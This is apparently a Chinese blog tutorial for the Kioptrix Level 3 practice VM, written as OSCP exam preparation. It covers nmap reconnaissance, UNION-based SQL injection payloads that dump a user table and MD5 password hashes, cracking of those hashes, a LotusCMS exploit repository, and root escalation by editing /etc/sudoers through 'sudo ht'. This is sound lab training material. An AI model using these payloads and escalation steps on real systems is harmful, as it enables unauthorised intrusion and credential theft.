首页 > 系统相关 >#oscp#渗透测试 kioptix level 3靶机getshell及提权教程

#oscp#渗透测试 kioptix level 3靶机getshell及提权教程

时间:2024-12-15 11:42:27浏览次数:4  
标签:getshell kioptix -- ip level 192.168 108.137 靶机 id

声明!
文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!

一、靶机搭建

点击扫描虚拟机

选择靶机使在文件夹即可

二、信息收集

前言

信息收集阶段,因为这里是靶机,所以不需要做什么,但是实际渗透测试中,大家一定要学会正确的隐藏自己的个人信息

扫完ip后即可得到以下信息

kali:192.168.108.130

目标ip:192.168.108.137

扫ip

nmap -sn 192.168.108.0/24

排除已知的,这个则是靶机ip

扫端口和服务信息

nmap -p 1-65535 192.168.108.137
nmap -sV 192.168.108.137

可用信息

OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

指纹探测

nmap 192.168.108.137 -p 22,80 -sV -sC -O --version-all

得到以下信息

操作系统信息:

OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

三、踩点或预探测

1.访问web服务

有以下页面

有登录框,可能存在漏洞,尝试弱口令无果

有个页面不可正常访问,可能是DNS缓存的问题,去设置一下

2. 设置域名解析

1. windows环境下

首先如果浏览器访问过该网站,需要找到浏览器缓存,这里我使用的火狐浏览器,点击管理数据

找到刚才的网站,删除缓存

在下面的目录下,选择host属性

C:\Windows\System32\drivers\etc

设置权限

设置之后在记事本编辑,设置如下,靶机ip 域名

然后刷新缓存即可

2. linu环境下设置

sudo vim /ets/hosts

输入以下保存即可

靶机ip kioptrix3.com

全部完成之后这个页面即可正常访问

3. 找出可利用点

sql注入

逐个点击之后发现此处存在id参数

尝试利用

测试id=2;id=1',发现报错,应该存在sql注入漏洞

LotusCMS漏洞

searchsploit LotusCMS 

第一个需要利用msfconsle,这里我们用第二个

github上搜索


复制以下链接

https://github.com/Hood3dRob1n/LotusCMS-Exploit.git

执行

git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit.git/

拉取成功

四、采取攻击措施

数据库爆破常用参数

爆列数

?id=1 order by 7--

爆行数

?id=2 union select 1,2,3,4,5,6--

爆数据库

?id=2 union select 1,database(),3,4,5,6--

得到数据库名: gallery

爆表

?id=2  union select 1,group_concat(table_name),3,4,5,6 from information_schema.columns where table_schema=database()--

结果

爆元素

?id=2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='dev_accounts'--

逐个查询表中元素,在第一个表中看到以下信息

查看此内容

?id=2 union select 1,group_concat(username),group_concat(password),4,5,6 from dev_accounts--

加密的MD5值:

用户名:dreg,loneferret

密码:0d3eccfb887aabd50f243b3f155c0f8,5badcaf789d3d1d09794d8f021f40f0e

MD5解密网站

用户名:dreg,loneferret
密码:Mast3r,starwars

登录

有两中方法,一种利用shell,一种直接在靶机登录

登录成功

五、提权

靶机

试试另外一个账户,输入exit退出登录

可以看到有checksec.shCompanyPolicy.README这两个文件

做到这一步就没有什么头绪了,换另一种方式也没用,这个时候需要删除虚拟机,重新导入

cat CompanyPolicy.README
sudo ht

重新导入后执行sudo ht 结果如下,按F3搜索,并输入etc/sudoers

此处添加/bin/bash,按F10保存并退出

提权成功

kali执行shell连接

看到需要加密算法,这里我利用了gpt找到了解决办法,实际考试是不允许的,所以平时学习遇到的新一定要熟练掌握

利用代码:

ssh -o HostKeyAlgorithms=+ssh-rsa loneferret@192.168.108.137

成功登录

sudo ht

发现需要添加环境变量

添加环境变量

export TERM=xterm

再次执行 sudo ht,后面的步骤则和之前一样

标签:getshell,kioptix,--,ip,level,192.168,108.137,靶机,id
From: https://www.cnblogs.com/GuijiH6/p/18607810

相关文章

  • oscp备考,oscp系列——Kioptix Level 1~5靶场详解,附重新使用VMware克隆的下载地址,VMwar
    公众号:泷羽Sec-尘宇安全oscp备考,oscp系列——KioptixLevel1~5靶场详解下载地址:https://pan.quark.cn/s/d290014bb3d8oscp备考,oscp系列——KioptixLevel1靶场前言oscp备考,oscp系列——KioptixLevel1靶场KioptixLevel1难度为简单靶场,主要考察nmap的使用已......
  • Kioptrix Level 1通关攻略
    学习内容来自 B站UP主泷羽sec,如涉及侵权马上删除文章。笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。修改靶机网络模式Kioptrix:Level1靶机的默认网络模式是桥接,在某些情况下,你希望将其修改为NAT模式,解决步......
  • #渗透测试#红队攻防 kioptix level 2靶机getshell及提权
    声明!文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!目录标题一、准备阶段1.找出ip端口和服务信息扫出ip扫出端口端口对应服务信息2.目录扫描3.漏洞扫描nmap扫描漏洞searchsploit查找漏洞二、获取权限1.访......
  • How to Check Engine Oil Level in a Porsche Using a PIWIS Tester
    MaintainingtheproperengineoillevelinyourPorscheiscrucialforoptimalperformanceandlongevity.Whiletraditionalmethodsmaysuffice,usingaPIWISTesteroffersenhancedaccuracyandensuresthatyourvehicleoperatessmoothly.Thisguidewill......
  • Kioptix Level 4靶场渗透测试
    声明!学习视频来自B站up主**泷羽sec**有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页[B......
  • 教你如何打穿Kioptrix-Level1靶机
    本篇文章旨在为网络安全初学者介绍渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Kioptrix-Level1靶机有一个初步的了解目录一、信息收集阶段1、扫描网段,发现主机2、扫描主机详细信息(1)22/tcpopensshOpenSSH2.9p2(protocol1.99)(2)80/tcpopenhttpApacheh......
  • 渗透测试-Kioptix Level 1靶机getshell及提权教程
    声明!学习视频来自B站up主泷羽sec有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!工具地址:通过网盘分享的文件:OSCP靶场链接:https:/......
  • BUUCTF Pwn jarvisoj_level2_x64 题解
    1.下载checksec64位用IDA64打开SHIFT+F12查找字符串找到了binsh函数里面也有system进主函数看看看到了栈溢出漏洞这是64位程序所以构造ROP链时要用rdi传参+用ret栈平衡找到这两个的地址:构造exp:运行得到flag  flag{4b1340f5-06be-4377-9630-fd2c77f016......
  • 靶场奇妙记之Kioptrix-Level1
    公众号:泷羽Sec-Ceo声明!        学习视频来自B站up主**泷羽sec**有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的......
  • 交易所 Level-2 历史行情数据自动化导入攻略
    用户部署完DolphinDB后,需要将历史股票数据批量导入数据库,再进行数据查询、计算和分析等操作。DolphinDB开发了ExchData模块,主要用于沪深交易所Level-2行情原始数据的自动化导入,目前已支持的数据源包括:沪深Level-2快照行情沪深逐笔委托沪深逐笔成交上交所逐笔合并注......